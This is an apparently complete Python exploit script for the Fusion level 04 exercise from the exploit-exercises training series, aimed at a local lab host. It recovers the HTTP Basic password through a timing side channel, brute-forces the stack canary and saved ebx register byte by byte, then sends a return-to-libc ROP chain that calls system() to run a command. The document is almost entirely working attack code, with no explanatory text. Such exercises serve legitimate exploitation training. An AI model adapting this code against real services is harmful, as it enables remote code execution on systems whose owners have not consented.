[exploit-exercises] Fusion level 04

from socket import *
import time
import base64
from struct import *
 
 
base_addr = 0xb782970d - 0x170d # get from stack smashing information
libc_base = 0xb7698113 - 0xf3 - 0x19020 # get from stack smashing information
 
read = base_addr + 0xd20
system = libc_base + 0x3cb20
pppr = base_addr + 0x19ba
bss = base_addr + 0x4240 + 0x300
 
# password check
"""
lists = range(ord('0'),ord('9')+1) + range(ord('a'),ord('z')+1) + range(ord('A'),ord('Z')+1)
j=0
password = ""
while j<16:
        for i in lists:
                print password+chr(i)
                s = socket(AF_INET, SOCK_STREAM)
                s.connect(('192.168.197.130',20004))
                s_time = time.time()
                s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+base64.encodestring(password+chr(i))+"\r\n\r\n")
                s.recv(1024)
                e_time = time.time()
                if (e_time - s_time) < 0.002:
                        password += chr(i)
                        break
        j=j+1
"""
password = "bdRT5ifONhSSbXUy"
 
print "Password is "+password
 
# canary check
"""
lists = range(0,0x100)
j=0
canary = ""
while j<4:
        for i in lists:
                print hex(i)
                s = socket(AF_INET, SOCK_STREAM)
                s.connect(('192.168.197.130',20004))
                s_time = time.time()
                payload = password
                payload += "A"*(2032)
                payload += canary
                payload += chr(i)
                payload = base64.encodestring(payload).replace("\n","")
                s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+payload+"\r\n\r\n")
                data = s.recv(1024)
                e_time = time.time()
                if "stack smashing" not in data:
                        canary += chr(i)
                        break
        j=j+1
 
print "canary: "+hex(unpack('<L',canary)[0])
"""
canary = pack('<L',0x36c9bf00)
 
#ebx check
"""
lists = range(0,0x100)
j=0
ebx = ""
while j<4:
        for i in lists:
                print hex(i)
                s = socket(AF_INET, SOCK_STREAM)
                s.connect(('192.168.197.130',20004))
                payload = password
                payload += "A"*(2032)
                payload += canary
                payload += "A"*12
                payload += ebx+chr(i)
                payload = base64.encodestring(payload).replace("\n","")
                s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+payload+"\r\n\r\n")
                try:
                        data = s.recv(1024)
                except:
                        data = ""
                if "HTTP/1.0 200 Ok" in data:
                        ebx += chr(i)
                        break
        j=j+1
print "ebx: "+hex(unpack('<L',ebx)[0])
"""
ebx = pack('<L',0xb782c118)
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20004))
raw_input('go?')
 
s.send("GET / HTTP/1.0\r\n")
 
cmd = "id\x00"
 
payload = password
payload += "A"*(2032)
payload += canary
payload += "A"*12
payload += ebx
payload += "A"*12
payload += pack('<L',read)
payload += pack('<L',pppr)
payload += pack('<L',0)
payload += pack('<L',bss)
payload += pack('<L',len(cmd))
 
payload += pack('<L',system)
payload += "AAAA"
payload += pack('<L',bss)
 
payload = base64.encodestring(payload).replace("\n","")
 
s.send("Authorization: Basic "+payload+"\r\n")
 
time.sleep(0.5)
 
s.send(cmd)
 
time.sleep(0.5)
print s.recv(1024)
 
s.close()